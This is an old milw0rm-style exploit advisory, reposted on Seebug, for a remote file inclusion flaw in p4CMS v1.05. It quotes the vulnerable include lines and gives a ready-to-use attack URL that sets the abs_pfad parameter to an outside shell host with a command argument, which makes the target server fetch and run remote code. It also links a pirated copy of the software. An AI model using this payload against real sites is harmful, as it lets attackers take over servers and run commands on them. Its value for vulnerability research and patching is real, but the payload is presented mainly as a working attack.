#============================================================================================== #p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://warez.gtasoft.ru/skripts/p4CMS.v1.05.Nullified-WTN.rar # #Version : v1.05 # #================================================================================================ #Bug in : abf_js.php # #Vlu Code : #-------------------------------- # # @require_once($abs_pfad."include/config.inc.php"); # @require_once($abs_pfad."include/mysql-class.inc.php"); # @require_once($abs_pfad."include/functions.inc.php"); # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/abf_js.php?abs_pfad=http://SHELLURL.COM?&cmd=id # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : CCtream - Cyper-worrier team # Special Thx To : Str0ke & simoo ================================================================================================== # milw0rm.com [2006-09-12]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论